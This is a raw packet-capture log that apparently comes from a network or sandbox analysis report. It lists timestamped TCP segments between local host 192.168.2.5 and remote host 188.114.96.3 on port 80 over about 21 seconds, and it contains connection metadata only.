                                                          Oct 20, 2024 18:18:00.954628944 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.167045116 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:01.169651031 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.170547009 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:01.198920012 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:01.203233957 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.203906059 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.259943008 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:01.583681107 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.584291935 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:01.589119911 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.640469074 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.758523941 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.758759022 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:01.761985064 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:01.763556004 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.016863108 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.022510052 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:02.027524948 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.195514917 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.195704937 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:02.200625896 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.200639963 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.200653076 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.556423903 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.556698084 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:02.561616898 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.585684061 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.667015076 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:02.732937098 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.733129025 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:02.738125086 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.738140106 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.738153934 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.799654007 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:02.854516983 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.135493994 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.135931969 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.140862942 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.266053915 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.267244101 CEST4981580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.271717072 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.271889925 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.272180080 CEST8049815188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.274058104 CEST4981580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.274321079 CEST4981580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.279211044 CEST8049815188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.310394049 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.310626030 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.315606117 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.315620899 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.315634012 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.620757103 CEST4981580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.625699997 CEST8049815188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.625741005 CEST8049815188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.625754118 CEST8049815188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.703371048 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.703711987 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.708791018 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.876585960 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.876750946 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:03.881752968 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:03.881767988 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:04.111371040 CEST8049815188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:04.167030096 CEST4981580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:04.684184074 CEST8049815188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:04.742046118 CEST4981580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:04.848269939 CEST4981580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:04.849239111 CEST4982280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:04.853358030 CEST8049815188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:04.853420973 CEST4981580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:04.854028940 CEST8049822188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:04.854084015 CEST4982280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:04.854216099 CEST4982280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:04.859030008 CEST8049822188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:04.880072117 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:04.979479074 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:05.198339939 CEST4982280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:05.203473091 CEST8049822188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:05.203619957 CEST8049822188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:05.203629971 CEST8049822188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:05.629832029 CEST8049822188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:05.698195934 CEST4982280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.001880884 CEST8049822188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.122594118 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.122663975 CEST4982280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.123446941 CEST4983080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.127803087 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.127893925 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.128210068 CEST8049830188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.128283978 CEST4983080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.128315926 CEST8049822188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.128371954 CEST4982280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.128463030 CEST4983080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.133253098 CEST8049830188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.479655981 CEST4983080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:06.484848976 CEST8049830188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.484867096 CEST8049830188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.484875917 CEST8049830188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.908596039 CEST8049830188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:06.979571104 CEST4983080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:07.292232990 CEST8049830188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:07.424036980 CEST4983080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:07.433933020 CEST4983580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:07.438745975 CEST8049835188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:07.438810110 CEST4983580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:07.438918114 CEST4983580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:07.444056988 CEST8049835188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:07.792095900 CEST4983580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:07.797252893 CEST8049835188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:07.797271013 CEST8049835188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:07.797287941 CEST8049835188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:08.237895012 CEST8049835188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:08.354665995 CEST4983580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:08.598839998 CEST8049835188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:08.666932106 CEST4983580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:08.731970072 CEST4983580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:08.733422995 CEST4983880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:08.737155914 CEST8049835188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:08.737368107 CEST4983580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:08.738262892 CEST8049838188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:08.738351107 CEST4983880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:08.738465071 CEST4983880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:08.743252993 CEST8049838188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.088946104 CEST4983880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.093826056 CEST8049838188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.093837023 CEST8049838188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.093903065 CEST8049838188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.524844885 CEST8049838188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.580790997 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.585699081 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.585776091 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.586019993 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.591778040 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.651305914 CEST4983880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.781639099 CEST8049838188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.888928890 CEST4984580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.893763065 CEST8049845188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.893821955 CEST4984580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.893937111 CEST4984580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.898684978 CEST8049845188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.933116913 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:09.938033104 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:09.963792086 CEST4983880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:10.245141029 CEST4984580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:10.249965906 CEST8049845188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:10.250109911 CEST8049845188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:10.407501936 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:10.463793993 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:10.641581059 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:10.645262957 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:10.650171041 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:10.817346096 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:10.817724943 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:10.822684050 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:10.822696924 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:10.822710037 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.204118013 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.204474926 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:11.209366083 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.378434896 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.378679991 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:11.383660078 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.383678913 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.383692026 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.714519024 CEST8049845188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.780561924 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.790975094 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:11.795901060 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.854387999 CEST4984580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:11.959316969 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.963150978 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:11.968046904 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.968060017 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:11.968075037 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.092942953 CEST8049845188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.166879892 CEST4984580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.355777979 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.463737011 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.486282110 CEST4983880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.486341953 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.486377954 CEST4984580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.487322092 CEST4985380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.491558075 CEST8049838188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.491606951 CEST4983880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.492120981 CEST8049842188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.492157936 CEST4984280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.492247105 CEST8049845188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.492261887 CEST8049853188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.492290020 CEST4984580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.492341042 CEST4985380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.492455959 CEST4985380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.497277021 CEST8049853188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.838970900 CEST4985380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:12.843888998 CEST8049853188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.843903065 CEST8049853188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:12.843914986 CEST8049853188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:13.311400890 CEST8049853188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:13.463783026 CEST4985380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:13.681202888 CEST8049853188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:13.778578997 CEST4985380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:13.807845116 CEST4985380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:13.808702946 CEST4985880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:13.813188076 CEST8049853188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:13.813313007 CEST4985380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:13.813591003 CEST8049858188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:13.813777924 CEST4985880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:13.813910007 CEST4985880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:13.818733931 CEST8049858188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:14.166963100 CEST4985880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:14.171997070 CEST8049858188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:14.172010899 CEST8049858188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:14.172032118 CEST8049858188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:14.617961884 CEST8049858188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:14.666851997 CEST4985880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:14.991956949 CEST8049858188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:15.073092937 CEST4985880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:15.124792099 CEST4985880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:15.125514030 CEST4986280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:15.130300045 CEST8049858188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:15.130367041 CEST4985880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:15.130592108 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:15.130661964 CEST4986280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:15.130748987 CEST4986280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:15.135601044 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:15.479419947 CEST4986280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:15.484420061 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:15.484436989 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:15.484457016 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:15.914083958 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:15.963692904 CEST4986280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:16.508117914 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:16.537457943 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:16.537528992 CEST4986280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:16.638923883 CEST4986280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:16.639664888 CEST4986680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:16.644546032 CEST8049866188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:16.644644022 CEST4986680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:16.644735098 CEST4986680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:16.645123959 CEST8049862188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:16.645183086 CEST4986280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:16.649760008 CEST8049866188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.004992962 CEST4986680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.010020018 CEST8049866188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.010036945 CEST8049866188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.010049105 CEST8049866188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.130992889 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.137176037 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.138241053 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.141603947 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.146440029 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.459938049 CEST8049866188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.495001078 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.500137091 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.500152111 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.666788101 CEST4986680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.830497026 CEST8049866188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.954569101 CEST4987480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.959451914 CEST8049874188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:17.959517002 CEST4987480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.959599018 CEST4987480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.963669062 CEST4986680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:17.964452982 CEST8049874188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:18.308712959 CEST4987480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:18.313668966 CEST8049874188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:18.313786983 CEST8049874188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:18.313797951 CEST8049874188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:18.736522913 CEST8049874188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:18.870006084 CEST4987480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.101535082 CEST8049874188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.166806936 CEST4987480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.197911978 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.228425026 CEST4987480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.229027987 CEST4988080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.233795881 CEST8049874188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.233824015 CEST8049880188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.233882904 CEST4987480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.233902931 CEST4988080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.234040022 CEST4988080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.239104986 CEST8049880188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.354324102 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.430666924 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.439564943 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.444377899 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.588831902 CEST4988080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.594156027 CEST8049880188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.594389915 CEST8049880188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.594408035 CEST8049880188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:19.791896105 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:19.796822071 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.037831068 CEST8049880188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.166764975 CEST4988080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.303100109 CEST8049880188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.354270935 CEST4988080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.453161001 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.482875109 CEST4988080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.483468056 CEST4988680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.488085985 CEST8049880188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.488145113 CEST4988080192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.488481998 CEST8049886188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.488545895 CEST4988680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.488634109 CEST4988680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.493467093 CEST8049886188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.666743040 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.675885916 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.676363945 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.681205034 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.838932037 CEST4988680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.843993902 CEST8049886188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.844010115 CEST8049886188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.844021082 CEST8049886188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.855206013 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.855400085 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:20.861814022 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.861910105 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:20.862407923 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:21.265302896 CEST8049886188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:21.391052961 CEST4988680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.469187021 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:21.635499001 CEST8049886188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:21.667243004 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.776138067 CEST4988680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.864274979 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.864367962 CEST4988680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.864780903 CEST4986680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.865083933 CEST4989180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.869530916 CEST8049869188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:21.869585991 CEST4986980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.869857073 CEST8049891188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:21.869913101 CEST4989180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.870031118 CEST4989180192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:21.870296955 CEST8049886188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:21.870330095 CEST8049866188.114.96.3192.168.2.5
